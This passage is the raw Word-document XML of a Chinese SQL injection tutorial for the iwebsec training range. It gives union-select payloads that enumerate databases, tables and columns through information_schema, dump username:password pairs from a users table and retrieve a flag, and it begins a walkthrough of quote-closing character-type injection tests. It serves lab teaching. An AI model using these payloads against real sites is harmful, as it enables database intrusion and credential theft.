          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>当前数据库名（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381DCEF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database()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>内置函数，返回当前连接的数据库名；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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>为占位符，匹配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列结构，确保语法正确。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62376B8D" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="heading_10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>获取所有数据库名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="49FB0F5C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schema_name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) f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information_schema.schemata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27C86EB0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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>列显示</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>所有数据库（如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>information_schema,mysql,iwebsec,test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB9408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information_schema.schemata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>系统表，存储所有数据库元数据；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group_concat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()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>将多行结果合并为一行，避免分</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>页导致</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的结果缺失。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C675363" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="heading_11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>获取当前库（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>）所有表名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="69E08D7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)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information_schema.tables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where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table_schema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='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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1C4ECE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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>列显示</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>库所有表（如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>users,news,flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0654C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原理：通过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where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table_schema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='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'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>过滤，仅查询目标业务库的表；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>表为核心目标（存储账号密码）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1453E867" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="heading_12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>表所有列名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="51D2CCB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?id=-1 union select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>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column_name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)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information_schema.columns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where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table_schema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='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' and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='users'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07010DBC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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>列显示</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>表所有列（如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>id,username,password,email</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D36625" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="heading_13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>表账号密码（核心目标）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="7DD0FC6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username,':',password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sep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>arator '&lt;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br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&gt;')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iwebsec.users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23204092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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>列分行显示所有账号密码（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin:admin123456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test:test123456</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3A6050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separator '&lt;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br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&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>用于换行，便于页面查看；直接指定</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iwebsec.users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>表，精准查询敏感数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464134C5" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="heading_14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>获取靶场通关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="56F04402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2,flag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 xml:space="preserve">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iwebsec.flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78EF199E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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>列显示</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>通关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>{sqli_123456}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4708350F" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="heading_15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>三、字符型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>注入完整流程（模拟场景）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="439E97EE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核心特征：参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>被单引号包裹，后端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语句格式为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'$id' LIMIT 0,1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；需先用单引号闭合前置引号，再拼接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逻辑，否则会触发语法错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFA2AA7" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="heading_16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>第一步：注入点判断（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>种核心测试方法）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="5BFC0437" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="heading_17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单引号测试（判断包裹类型）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="0536FA6E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?id=1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A858560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 '1'' LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DFE0A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预期结果：页面报错（提示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语法错误，含单引号相关报错）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14544257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原理：输入的单引号与后端的单引号形成闭合，多余一个单引号破坏语法，报</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>错说明</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>参数被单引号包裹，确定为字符型注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71221892" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="heading_18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2. and '1'='1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>恒真测试</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>（判断是否可拼接逻辑）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="56BF9D1E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?id=1' and '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E20057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'1' and '1'='1' LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A53F903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预期结果：页面正常显示数据，与原页面（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）一致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1BBFB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1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>闭合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>后端前置单引号，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>and '1'='1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>拼接恒真条件</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，且后端的单引号会自动闭合后置引号，整个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语法合法，查询正常，证明可拼接逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034FE0DC" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="heading_19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3. and '1'='2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
